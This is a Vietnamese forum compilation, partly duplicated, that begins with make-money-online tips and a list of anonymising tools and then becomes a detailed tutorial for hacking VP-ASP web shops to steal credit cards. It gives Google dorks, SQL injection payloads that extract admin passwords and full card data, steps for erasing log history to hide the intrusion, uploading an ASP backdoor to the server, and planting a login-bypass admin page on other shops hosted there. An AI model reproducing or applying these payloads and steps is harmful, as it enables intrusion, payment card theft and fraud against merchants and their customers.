Để có thể thành công với công việc này yêu cầu các bạn phải thật sự thích thú với công việc này và bắt đầu nó với mục đích học tập là trước hết vì kiếm tiền trên mạng thời gian đầu bạn ko thể nghĩ là sẽ làm giàu bằng công việc này trong 1 thời gian ngắn..........."dục tốc bất đạt" . Bạn hãy nhớ kĩ câu này. lan man vậy đủ rồi...giờ chúng ta vào phần chính.
Newbie mới vào nghề chia làm 2 hướng:
Nếu bạn có vốn bạn có thể mua e-gold( 1 loại tiền thông dụng nhất trên mạng hiện nay). Bạn có thể vào box Exchange ở forum này để tiến hành giao dịch với các thành viên.Về cách tạo tài khoản e-gold ban hãy tham khảo trên Forum này.
Lưu ý: khi tiến hành giao dịch nên chú ý đến uy tín của người bán
tốn nhất nếu có thể bạn hãy gặp mặt trực tiếp.
Nếu bạn không có vốn bạn có thể khởi sự với 3 hình thức sau:
PTR : paid to read:đọc mail kiếm tiền.
PTC : paid to click:click vào banner quảng cáo để kiếm tiền.
PTSignup : paid to signup:đăng kí làm ref cho các member của các site nước ngoài để kiếm tiền.
Theo tôi bạn nên bắt đầu chơi PTSignup : loại này có thể giúp bạn kiếm vốn 1 cách nhanh chóng.
Bạn có thể bắt đầu với các site :No-min Payout( không giới hạn mức tiền trả ) như:
Chào các bạn!
Sau 1 thời gian kiếm tiền trên mạng,tui mạn phép trình bày ý kiền của mình về con đường kiếm tiền trên mạng để cho các bạn..những người mới vào nghề khỏi bỡ ngỡ khi tiếp xúc với khối lượng thông tin trên mạng khổng lồ mà ko biết nên bắt đầu từ đâu...
Tui xin nói trước:
Để có thể thành công với công việc này yêu cầu các bạn phải thật sự thích thú với công việc này và bắt đầu nó với mục đích học tập là trước hết vì kiếm tiền trên mạng thời gian đầu bạn ko thể nghĩ là sẽ làm giàu bằng công việc này trong 1 thời gian ngắn..........."dục tốc bất đạt" . Bạn hãy nhớ kĩ câu này. lan man vậy đủ rồi...giờ chúng ta vào phần chính.
Newbie mới vào nghề chia làm 2 hướng:
Nếu bạn có vốn bạn có thể mua e-gold( 1 loại tiền thông dụng nhất trên mạng hiện nay). Bạn có thể vào box Exchange ở forum này để tiến hành giao dịch với các thành viên.Về cách tạo tài khoản e-gold ban hãy tham khảo trên Forum này.
Lưu ý: khi tiến hành giao dịch nên chú ý đến uy tín của người bán
tốn nhất nếu có thể bạn hãy gặp mặt trực tiếp.
Nếu bạn không có vốn bạn có thể khởi sự với 3 hình thức sau:
PTR : paid to read:đọc mail kiếm tiền.
PTC : paid to click:click vào banner quảng cáo để kiếm tiền.
PTSignup : paid to signup:đăng kí làm ref cho các member của các site nước ngoài để kiếm tiền.
Theo tôi bạn nên bắt đầu chơi PTSignup : loại này có thể giúp bạn kiếm vốn 1 cách nhanh chóng.
Bạn có thể bắt đầu với các site :No-min Payout( không giới hạn mức tiền trả ) như:
no-minimum.com
|
donkeymails.com
|
opt-in-pays.com
|
no-minimum.realpaid.net
|
wordwide-cash.com
|
springlinks.com
|
click-rewards.com
|
mails2cash.com
|
gclicker.com
|
x-mails.biz
(10 cent)
|
leapcash.com(5
cent)
|
qualiyt-cash.com
|
money-hungry.com(3
cent)
|
spidermanlinks.info(10
cent)
|
tornadoofcash.com(20
cent)
|
10 công cụ fake ip mạnh nhất
Top 10 Anonymous Utilities All-in-one Download
Top 10 Anonymous Utilities All-in-one Download
GhostSurf
Pro 2005 Platinum v3.0
|
Steganos
Internet Anonym Pro v7.1.6
|
NetConceal
Anonymizer v2.9.21.2
|
GetAnonymous
Pro v2.1
|
Complete
Anonymous Web Surfing v3.3 Retail
|
Complete
Anonymous Internet v1.0 Retail
|
SurfAnonymous
v1.0.1.0 XP
|
SurfNOW
Professional Gold 2.7.0.1
|
StompSoft
StealthSurf X-treme v1.1
|
Invisible
Browsing v4.0.0.1
|
Bài 2:
Các line thường gặp khi hack JET (Union)
line 559 -> 92
|
line 60->54
|
line 503 -> 48
|
line 868 -> 37
|
line 467 -> 47
|
line 468 -> 47
|
line 191 -> 56
|
line 184 -> 47,43,53
|
line 191 -> 48
|
line 211 -> 43
|
line 187 -> 43
|
line 59 -> 70
|
line 930->37
|
line 191=>56,48
|
line 188=>53,56,60
|
line 185=>86,43
|
line 202=>84,91
|
line 208=>48,57
|
line 64 =>53
|
line 58=>43
|
line 424 => 44,45
|
line 482 => 47
|
line 325 => 43
|
line 465 => 43,47
|
line 965 => 41
|
line 505 => 68,48
|
line 503 => 48,45,51
|
Cách biến 1 shop CC thành shop CVV
1. Display
Orders
|
2. Edit Categories
|
3. Edit Products
|
4. Configure Shopping Cart
|
5. Edit VP-ASP Tables
|
6. Edit Shipping
|
7. Sales Reports
|
|
Nháy
vào configure shipping cart sẽ
thấy
|
|||
1. Merchant details
|
2. Products 1
|
3. Products 2
|
4. Customer Information
|
5. Payments
|
6. Shipping
|
||
Nháy vào payments chọn như sau
|
|||
allowcreditcards Yes
|
allowinvalidcards No
|
allowotherpayments No
|
bypasscreateorderpage Yes
|
cardissueNumber Yes
|
cvndisplay Yes
|
cvnrequired Yes
|
encryptcreditcard No
|
Hack VPASP Toàn tập
Part I
Part I
Cách tìm kiếm shop vp asp:
Đa số shop vp asp bị lỗi 3 chỗ
này:
1-shopdisplaysproducts.asp?[tham số theo sau]
2-shopexd.asp?[tham số theo sau]
3-shoptellafriend.asp?[tham số theo sau]
1-shopdisplaysproducts.asp?[tham số theo sau]
2-shopexd.asp?[tham số theo sau]
3-shoptellafriend.asp?[tham số theo sau]
Vì vậy khi gặp 1 shop vp asp, bạn
nên thử luôn 3 chỗ này xem có bị lỗi không.
Nếu bạn chưa có shop nào để hack,
thử sử dụng google để tìm kiếm: Sử dụng từ khóa inurl:[nội dung muốn xuất hiện
trên url]
Nếu bạn muốn tìm chính xác hơn nữa băng cách thêm tham số sau nó, hãy sử dụng từ khóa: allinurl:[nội dung muốn xuất hiện trên url]
Nếu bạn muốn tìm chính xác hơn nữa băng cách thêm tham số sau nó, hãy sử dụng từ khóa: allinurl:[nội dung muốn xuất hiện trên url]
Cách thử lỗi:
Sử dụng dấu quote để thử: ‘
Truyền dấu ‘ đến các tham số bằng cách thêm nó vào sau giá trị của các biến. Ví dụ:
shopexd.asp?[tham số thứ nhất]=[gia tri thứ nhất]&[tham số thứ 2]=[giá trị thứ 2]&….
-> thử lỗi tham sô thứ nhất: shopexd.asp?[tham số thứ nhất]=[giá trị thứ nhất]’&….
Truyền dấu ‘ đến các tham số bằng cách thêm nó vào sau giá trị của các biến. Ví dụ:
shopexd.asp?[tham số thứ nhất]=[gia tri thứ nhất]&[tham số thứ 2]=[giá trị thứ 2]&….
-> thử lỗi tham sô thứ nhất: shopexd.asp?[tham số thứ nhất]=[giá trị thứ nhất]’&….
Nếu truyền cho tham số thứ nhất
và lỗi không xuất hiện, hãy thử cho tham số thứ 2.
Nếu trang đó bị lỗi, nó sẽ xuất
hiện thông báo cho bạn, nhin lên dòng thông báo đó, bạn có thể nhận biết cơ sở
dữ liệu của nó sử dụng là gì: Đa số chỉ có 2 dạng là Microsoft Access và SQL
Server:
Microsoft OLE DB Provider for
ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server
Driver][SQL Server]Unclosed quotation mark before the character string ”.
/shopping/$.asp, line 365
hoặc dạng khác, như Jet Database
v..v… thì nó sử dụng M Access
Cơ sở dữ liệu của shop VP ASP:
Có các table sau: affiliatelog,
affiliates, billing, categories, configuration, configuration1, coupons,
customerprices, customers, downloads, gifts, hackers, languages, mycompany,
oitems, orders, ordertracking, pinnumbers, prodcategories, prodfeatures,
products, projects, quantitydiscounts, registrant, registryitems, reviews,
savedcarts, searchresults, shipmethods, suppliers, tblaccess, tbllog, tbluser,
tamplates.
Những table quan trọng:
-Orders: Chứa CC
-tblUser: Chứa username và pass
của admin
-configuration: chứa link admin, và cấu hình cho shop
-configuration: chứa link admin, và cấu hình cho shop
Những column của 3 table trên:
-Orders: orderid, ocustomerid,
odate, orderamount, ofirstname, olastname, oemail, oaddress, ocity, opostcode,
ostate, ocountry, ophone, ofax, ocompany, ocardtype, ocardno, ocardname,
ocardexpires, ocardaddress, oprocessed, ocomment, otax, opromisedshipdate,
oshippeddate, oshipmethod, oshipcost, oshipname, oshipcompany, oshipemail,
oshipmethodtype, oshipaddress, oshiptown, oshipzip, oshipstate, oshipcountry,
opaymethod, other1, other2, otime, oauthorization, oerrors, odiscount ostatus,
oaffid, odualtotal, odualtaxes, odualshipping, odualdiscount, ohandling,
odualhandling, coupon, coupondiscount, coupondiscount, giftcertificate,
giftamountused, vatnumber, ipaddress, hackeryesno, opending, shipmessage,
hearaboutus.
-> chừng này column là đầy đủ info của card: odate, oemail, oaddress, ocity, opostcode, ostate, ocountry, ophone, ocardtype, ocardname, ocardno, ocardexpires, oauthorization.
-> chừng này column là đầy đủ info của card: odate, oemail, oaddress, ocity, opostcode, ostate, ocountry, ophone, ocardtype, ocardname, ocardno, ocardexpires, oauthorization.
-tblUser: fldauto, fldusername,
fldpassword, fldaccess, flddatabase
-> fldusername, fldpassword <– chứa username và pass admin
-> fldusername, fldpassword <– chứa username và pass admin
-configuration: id, fieldname,
fieldvalue, fieldgroup, fieldyesno
-> ăn thua là fieldname và fieldvalue. Tại record thứ 16 là nơi chứa link admin . Giá trị của fieldname tại đấy là: xadminpage, còn fieldvalue thì phải hack mới biết ^ ^, yami ko phải là thầy bói ^ ^. Nhưng value mặc định của fieldvalue là: shopadmin.asp
-> ăn thua là fieldname và fieldvalue. Tại record thứ 16 là nơi chứa link admin . Giá trị của fieldname tại đấy là: xadminpage, còn fieldvalue thì phải hack mới biết ^ ^, yami ko phải là thầy bói ^ ^. Nhưng value mặc định của fieldvalue là: shopadmin.asp
Hack shop:
ví dụ trang sau bị lỗi:
hxxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3
Lỗi ở tham số thứ 2.
Đối với M Access:
-Tìm username và pass của admin:
code: %20union select 1 from
tbluser’
hxxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3%20union
select 1 from tbluser’
Và các shop thì ko bao giờ chỉ có
1 column trong db nên chắc chắn nó sẽ báo:
The number of columns in the two
selected tables or queries of a union query do not match.
Đa số các cột thường lớn hơn 30,
nên tôt nhất là thử từ số 30:
code: %20union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,27,28,29,30 from tbluser’
mục đích đánh số thứ tự, chẳng
qua là chỉ để phân biệt các column với nhau, nên bạn không cần phải để ý rằng:
“Liệu mình có gõ theo đúng thứ tự chưa…” Thậm chí bạn có thể không cần phải gõ
theo thứ tự: %20union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1 from tbluser’
Nhưng khi phát sinh lỗi cần thiết thì lại không phân biệt được column nào mà thôi.
Nhưng khi phát sinh lỗi cần thiết thì lại không phân biệt được column nào mà thôi.
Tiếp tục:
hxxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3%20union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,27,28,29,30 from tbluser’
Nếu lại hiện ra lỗi trên thì
nghĩa là chưa đúng số column cần thiết, bạn phải thêm vào, bây giờ tăng lên 31,
nếu vẫn chưa đúng lại tăng lên 32 … cho đến khi ko còn lỗi, mà thay vào đó…,
bạn hãy chú ý, sẽ có những con số rất lạ, xuất hiện bất thường trên trang web
này. Ví dụ như 4, 22 hay bấy kì số nào…(đưong nhiên những số này phải là những
số mà bạn đã type trên code)
Ví dụ trên web xuất hiện số 4 và
3. Mình sử dụng số 3 cho việc khai thác u va p của admin. Nhìn lên code, tìm
chỗ nào có số 3 rồi thay bằng: fldusername%2b’/’%2bfldpassword.
code: %20union select 1,2,fldusername%2b’/’%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser’
code: %20union select 1,2,fldusername%2b’/’%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser’
Nhấn enter và chỗ số 3 bất thường
đó sẽ biến thành username/password ^ ^
-Tìm link admin:
link mặc định là shopadmin.asp,
thử thay shopdisplayproducts.asp… thanh shopadmin.asp. Nếu không được thi… đành
tự kiếm thôi
và nó nằm ở đâu, như ở trên đã
nói nó nằm tại bảng configuration:
vẫn giữ nguyên số cột mà bạn đã khai thác được, thay column đầu bằng fieldname=’xadminpage’, thay column lỗi-muốn hiển thị bằng fieldvalue (ở đây là số 3)
vẫn giữ nguyên số cột mà bạn đã khai thác được, thay column đầu bằng fieldname=’xadminpage’, thay column lỗi-muốn hiển thị bằng fieldvalue (ở đây là số 3)
%20union select
fieldname=’xadminpage’,2,fieldvalue,4,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2
7,28,29,30,31,32,33,34,35,36,37 from configuration’
1 là bạn sẽ có link admin, 2 là
sẽ gặp dòng thông báo này:
The Microsoft Jet database engine
cannot find the input table or query ‘configuration’. Make sure it exists and
that its name is spelled correctly.
Nó báo thế nghĩa là không có bảng
config -> thằng admin đã xóa bảng confing và hết lấy link admin
Nếu bạn không có được link admin,
bạn vẫn có thể get cici như thường, bằng cách truy vấn table orders.
code (cũng dán tại column số 3):
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from orders’
Thay số 3 bằng cái này:
odate%2b’/’%2bofirstname%2b’/’%2bolastname%2b’/’%2boaddress%2b’/’%2bocity%2b’/’%2bostate%2b’/’%2b
opostcode%2b’/’%2bocountry%2b’/’%2bophone%2b’/’%2bocardno%2b’/’%2bocardname%2b’/’%2bocardexpires%2b’/’%2boauthorization
opostcode%2b’/’%2bocountry%2b’/’%2bophone%2b’/’%2bocardno%2b’/’%2bocardname%2b’/’%2bocardexpires%2b’/’%2boauthorization
Nếu không hiện gì ra, nghĩa là
shop đó không có cici ^ ^
- Hack Pass thứ 2:
Nếu bạn có link admin, nhưng shop
này có tới 2 pass: Kiếm đâu ra pass thứ 2 bây giờ?
Không có gì khó, nhưng bạn phải
xem trang đó có bị lỗi tại page: shopexd.asp hay không, nếu không có lỗi tại đó
thì… khỏi kiếm pass 2 lun ^ ^.
Cách hack như trên, giả sử tại
page này column 20 bị lỗi
Dùng code như khi kiếm link admin
tại chỗ này:
%20union select fieldname=’xadminpage’,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from configuration’
%20union select fieldname=’xadminpage’,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from configuration’
Rồi, nếu ok nó sẽ sổ ra mã nguồn
asp của trang admin, và bạn sẽ nhìn thấy pass 2 tại dòng lênh: Const
SecondPassword=”pass 2″
Tiếp, nếu bạn muốn tìm link admin
tại page này thì phải dùng code sau:
%20union select fieldname=’xadminpage’,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from configuration’
%20union select fieldname=’xadminpage’,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from configuration’
nếu nó vẫn ra mã nguồn, thì nghĩa
là số kí tự của link admin nhỏ hơn 9 hoặc bằng 9, bạn thay 9 bằng số 7. ->
giả sử nó sẽ hiện ra thế này: shoa.as Nhìn thể này thì đủ biết link admin là gì
rồi. Còn nếu dùng code trên mà nó chưa hiện ra dấu . thì bạn chưa thể khẳng
định được, thì hãy tăng lên, thay 9 bằng 11 hoặc 12 v..v…. Cứ thế.
Part II
-Shop VP ASP sử dụng SQL Server
Không giống như MS Access, SQL
Server có một table mặc định chứa tất cả tên của table và column của cơ sở dữ
liệu đó. Table đó tên là: information_schema
Các trang buôn bán, ng ta không
phải ai cũng biết lập trình web nên có thể họ mua bất kì script của một cá nhân
hoặc một công ty nào đó, giống như script của vp asp vậy. Có thể bạn biết shop
đó hiện đang dùng script gì, bạn có thể mua bản đó về cài offline và nghiên cứu
từ csdl đến cấu trúc site để tìm ra lỗi của nó. Xong đối với những shop dùng
csdl là SQL Server thì có thể bạn không cần phải làm vậy.
Nhờ có hàm convert bạn có thể cố
ý biến đổi kiểu dữ liệu của nó để gây ra lỗi. Nên cách khai thác kiểu này nhanh
hơn cách dùng cho access. Và đối với access bạn phải biết trước tên của đối
tượng cần truy vấn.
~~~~
code khai thác tên các table:
%20and 1=convert(int,(select top 1 table_name from information_schema.tables))–sp_password
%20and 1=convert(int,(select top 1 table_name from information_schema.tables))–sp_password
code khai thác tên các column:
%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’[tên của table cần khai thác column]’)))–sp_password
%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’[tên của table cần khai thác column]’)))–sp_password
code khai thác giá trị của các
column:
%20and 1=convert(int,(select top 1 [tên column 1] %2b ‘/’ %2b [tên column 2] from tbluser))–sp_password
%20and 1=convert(int,(select top 1 [tên column 1] %2b ‘/’ %2b [tên column 2] from tbluser))–sp_password
~~~~
Xong vì đối với shop vp asp, tên
của các table và column đều đã được public cả rồi nên code sau dùng để khai
thác một cách nhanh chóng.
Tìm username và pass của admin:
%20and 1=convert(int,(select top
1 fldusername %2b ‘/’ %2b fldpassword from tbluser))–sp_password
hxxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3%20and
1=convert(int,(select top 1 fldusername %2b ‘/’ %2b fldpassword from
tbluser))–sp_password
Tim link admin:
%20and 1=convert(int,(select top
1 fieldname%2b’/’%2bfieldvalue from configuration where
fieldname=’xadminpage’))–sp_password
Nếu không có link admin bạn có
thể khai thác cc bằng cách sau:
%20and%201=convert(int,(select%20top%201%20convert
(char,(odate))%2b’/’%2bofirstname%2b’/’%2bolastname%2b’/’%2boaddress
%2b’/’%2bocity%2b’/’%2bostate%2b’/’%2bopostcode%2b’/’%2bocountry%2b’/’%2bophone%2b’/’%2bocardno%2b’/’%2bocardname
%2b’/’%2bocardexpires%2b’/’%2boauthorization%20from%20orders where ocardno%20not%20in(”) and right(ocardexpires,2) not in(’05′)))–sp_password
%2b’/’%2bocity%2b’/’%2bostate%2b’/’%2bopostcode%2b’/’%2bocountry%2b’/’%2bophone%2b’/’%2bocardno%2b’/’%2bocardname
%2b’/’%2bocardexpires%2b’/’%2boauthorization%20from%20orders where ocardno%20not%20in(”) and right(ocardexpires,2) not in(’05′)))–sp_password
(Đoạn code dài quá nên ngắt làm 3
phần, các bạn copy thì nhớ cẩn thận nha)
code trên có nghĩa khai thác toàn
bộ thông tin của card mà có ngày hết hạn không phải là năm 2005. Mỗi khi nhận
được 1 cvv, bạn copy cc number vào phần ocardno not in(”). Ví dụ bạn nhận được
cái cảd 4111111111111111 thì để lấy cái tiếp theo sao không cho nó trùng lặp
thi thêm vào cho ocardno not in(”,’4111111111111111′). Ngăn cách bằng dấu ,
Đoạn code trên có chỗ
convert(char,(odate)) có nghĩa nó sẽ chuyển trước giá trị là day time sang kiểu
char trước khi chuyển sang kiểu int. Vì nếu bạn chuyển ngay sang kiểu int thì
khoảng giá trị là ngoài vùng được chọn và sẽ mang lại kết quả không mong đợi.
Đó là lý do vì sao nhiều bạn hack shop qua lỗi Sql inject lại không lấy được
trường ngày tháng.
Tiếp theo về pass 2. Làm sao để
tìm? Sử dụng code sau, và bạn lại phải 1 lần nữa ngồi đoán số column:
%20union select top 1
1,2,3,4,5,6… from configuration
Cũng giống như cách hack đối với
Access nhưng chỉ khác là có thêm top 1
Part III
Khi vào login được vào quyền
admin, nhiệm vụ đầu tiên của bạn là phải xóa log history đi, để thằng chủ shop
không biết được có ng khác xâm nhập vào trái phép. Chọn mục Log History ->
chọn lần login và địa chỉ ip của máy mình -> Xóa. Nhưng có khi bạn lại không
thấy mục History đâu, và không chỉ riêng gì History mà những mục khác cũng
không có. Vậy là thằng chủ shop không enable lên hoặc user của bạn không đủ
quyền hạn.
Vì bạn đang nắm là quyền admin,
những mục kia chẳng qua là nó đã hide đi mà thôi, nếu bạn muốn chọn một user ở
mức cao hơn bạn có thể thay dòng shopadmin1.asp trên url bằng page sau:
shopa_user_control.asp Vào đây bạn có thể edit và xem pass của các user, nếu
muốn đăng nhập user khác, hãy clear cookie và đăng nhập lại.
Các page quan trọng:
-Xem tất cả các Order:
shopa_listorders.asp
-Mục Log History: shopa_loghist.asp
-Xem quyền hạn các User: shopa_user_control.asp
-Truy vấn csdl: shopa_query.asp
-Config Shop: shopa_configlist.asp và shopa_config.asp
-Mục Log History: shopa_loghist.asp
-Xem quyền hạn các User: shopa_user_control.asp
-Truy vấn csdl: shopa_query.asp
-Config Shop: shopa_configlist.asp và shopa_config.asp
Khi hack được shop, ít ra bạn sẽ
có được mailist, chọn mục Query hoặc xóa page shopadmin1.asp trên url và thay thế
bằng page: shopa_query.asp ->Gõ vào ô query và run lệnh sau bạn sẽ có
mailist: select oemail from orders
Hack lên server:
Nghe thì ghê gớm lắm xong lại rất
đơn giản. Bạn vào mục Display Products và Edit bất kì một sản phẩm nào. Kéo
xuống, bạn sẽ thấy dòng chữ upload images, click vào đó. Hoặc nếu không thấy,
vì thăng chủ shop hơi bị khôn thì dán page này vào: shopa_upload.asp Sau đó bấm
Browse… và chọn 1 con backdoor từ máy của bạn để úp lên server của nó. Nhớ là
backdoor ASP nhé .
Dạo này thằng chủ shop cũng có
nhiều đứa khôn lắm, nên có thể up thành công hoặc không. Upload thành công thì
nó sẽ báo là Upload has been sucess… và bên dưới là đường dẫn chứa backdoor của
bạn, copy và dán lên url rồi….
Lên server rồi thì tự mò nha,
cũng dễ thôi ^ ^
Mà mục đích lên server là gì nhỉ?
Là để tìm kiếm nhữ site shop khác cũng thuê chỗ tại server đó. Bạn sẽ có quyền
tải file, dựa vào khả năng phán đoán bạn sẽ biết nó cất csdl ở đâu và down về.
Khi up con này lên server rồi, thì bạn bấm up để trở ra thư mục lớn hơn, rồi
nhìn lên url, bạn sẽ thấy nguyên cái đường dẫn, bạn thay đổi đường dẫn… cứ
tưởng tượng đơn giản, đó là cái máy tính của bạn vậy.
Part IV
Sau khi các bạn lên server, và tìm được thư mục chứa các website thì công việc tiếp theo là phải tìm cho được đâu là cái shop để tiếp tục kiếm CC
Sau khi các bạn lên server, và tìm được thư mục chứa các website thì công việc tiếp theo là phải tìm cho được đâu là cái shop để tiếp tục kiếm CC
Nếu như nó đặt tên thư mục cho
mỗi site là tên gợi nhớ (domain của site) thì chắc hẳn các bạn dễ dàng gõ vào
address của trình duyệt cái domain của site đó và biết nó có phải là 1 shop hay
không! Nhưng nó lại không thích đặt vậy, mà lại đánh kí tự số cho từng site,
hoặc đặt tên lung tung thì bạn làm thế nào để biết được domain của nó là gì?
Nếu như phải down 1 vài page về, nhìn vào baner hay hình ảnh nào đó hoặc phần
copyright có thể có tên miền thì quả thật là hơi mất thời gian và có thể là
không tìm thấy.
Cách hữu hiệu nhất, đơn giản nhất
và tốt nhất là bạn nên sử dụng google. Download 1 page về, copy phần copyright
hoặc phần đặc trưng của site vào ô search của google. Bấm enter, bạn sẽ thấy
được … trang bạn cần tìm.
Hoặc vào google gõ cú pháp sau:
Hoặc vào google gõ cú pháp sau:
“cụm từ đặc trưng trong page”
inurl:[tên của page bạn down về]
Okie, thế là đã tìm được tên
miền, và hãy tìm xem có shop nào không? Khi đã tìm ra 1 shop, dù cho shop đó
cất kĩ database đến đâu, hay không có lỗi, bạn vẫn có thể lấy cc của nó được
Ví dụ, mình tìm được 1 thư mục
tên A có chứa site shop. Vào trong thư mục đó, 1 là bạn có thể tìm thấy
database và down về, xong nếu không thể lấy được thì hãy tìm page login admin
của nó! Bạn đang ở trên server mà, nên việc tìm page của admin cũng không khó
lắm. Khi đã tìm ra, username và pass ở đâu để bạn có thể đăng nhập nhỉ ??? Và
shop này không hề có lỗi nào.
Đầu tiên bạn hãy down cái page
admin về. Bấm vào dòng chữ “MASS TEST IN…” của con backdoor, nó sẽ liệt kê cho
bạn thấy những thư mục nào bạn có thể upload file. Nhưng trước khi upload, bạn
hãy sửa lại mã nguồn ở page admin.
Xác định thư mục bạn sẽ upload.
Tìm trong page admin (đã save về máy và đã mở mã nguồn lên) xem có dòng include
… thì thay đường dẫn cho thích hợp, để từ thư mục bạn sẽ up lên, nó có thể tìm
thấy file mà bạn include. Tiếp đến tìm tù này: replace
Và bỏ hàm replace đi. Ví dụ trong
code: user=replace(username,”’,’”‘). Bỏ dòng này đi, tương tự đối với những chỗ
khác, tuy nhiên bạn cần phải linh hoạt hơn. Có những shop viet code sử dụng hảm
replace như sau: Select * from tbl where replace(user,”’,’”‘)… Nếu như thế này
thì bạn bỏ cái hàm replace thôi, và sẽ thành đoạn code như sau: select * from
tbl where user…
Xong xuôi rồi thì save lại và up
lên thư mục bạn đã chọn.
Ví dụ domain của shop đó là:
hxxp://yami.com/
link admin chính xác là:
hxxp://yami.com/admin.asp
thư mục cho phép up là images.
Link bạn up trang admin giả lên
sẽ có dạng: hxxp://yami.com/images/admin.asp
Rồi! Bạn hãy gõ
hxxp://yami.com/images/admin.asp vào trình duyệt và thử login
Username: ‘or”=’
Password: ‘or”=’
Password: ‘or”=’
bấm ok và page not found ^ ^… cái
này các bạn đừng lo, vì trong file include nó sẽ chỉ sang 1 trang mà admin đã
đăng nhập không phải nằm trong images nên page not found cung chẳng có gì là
lạ. Tuy nhiên, máy của bạn đã lưu cookie của admin nên bạn chỉ cần gõ đúng link
admin: hxxp://yami.com/admin.asp. Thế là nó tự động chuyển sang trang mà bạn đã
login vào admin. ^ ^ Vô được rồi thì… get cc thôi
HƯỚNG DẪN HACK SHOP
BẰNG SQL INJECTION
Phần I
Tất cả những kiến thức này đều rất căn bản , Nhưng lại hết sức hữu dụng trong việc hack shop.Chỉ cần thành thạo những kiến thức này là bạn hack được cả đống shop rồi .
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở xxxx.google.com hoặcxxxx.search.com Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id=”ho� � �c search theo domain allinurl:”.com/shopdisplayproducts.asp?id= “bạn có thể thay .com bằng .net,.biz ,.us…..vv thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9″
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta.thêm dấu nháy đơn ‘ .
xxxxxxvictim.com/shopping/shopdisplay…asp?id=153′
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem xxxx.victim.com/shopping/shopdisplay…sp?cat=153′
Phần I
Tất cả những kiến thức này đều rất căn bản , Nhưng lại hết sức hữu dụng trong việc hack shop.Chỉ cần thành thạo những kiến thức này là bạn hack được cả đống shop rồi .
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở xxxx.google.com hoặcxxxx.search.com Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id=”ho� � �c search theo domain allinurl:”.com/shopdisplayproducts.asp?id= “bạn có thể thay .com bằng .net,.biz ,.us…..vv thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9″
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta.thêm dấu nháy đơn ‘ .
xxxxxxvictim.com/shopping/shopdisplay…asp?id=153′
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem xxxx.victim.com/shopping/shopdisplay…sp?cat=153′
Trích: Microsoft OLE DB Provider
for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the character string
”./shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi. Bạn nhìn kỹ nhé
—–> Unclosed quotation mark before the character string đối với lỗi này ta
sẽ dùng and 1=convert , Còn nếu nó báo thế này
CODE
Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘5′%’ and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 467
Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘5′%’ and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 467
Thì đây là lỗi jet Bạn hãy chuyển
qua phần 2
Bây giờ ta tiếp tục :
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”./shopping/shopdisplayproducts.asp, line 93
Bây giờ ta tiếp tục :
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”./shopping/shopdisplayproducts.asp, line 93
Bước I:
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))–sp_password
bạn xoá dấu ‘ rồi thêm dòng query này vào phía sau
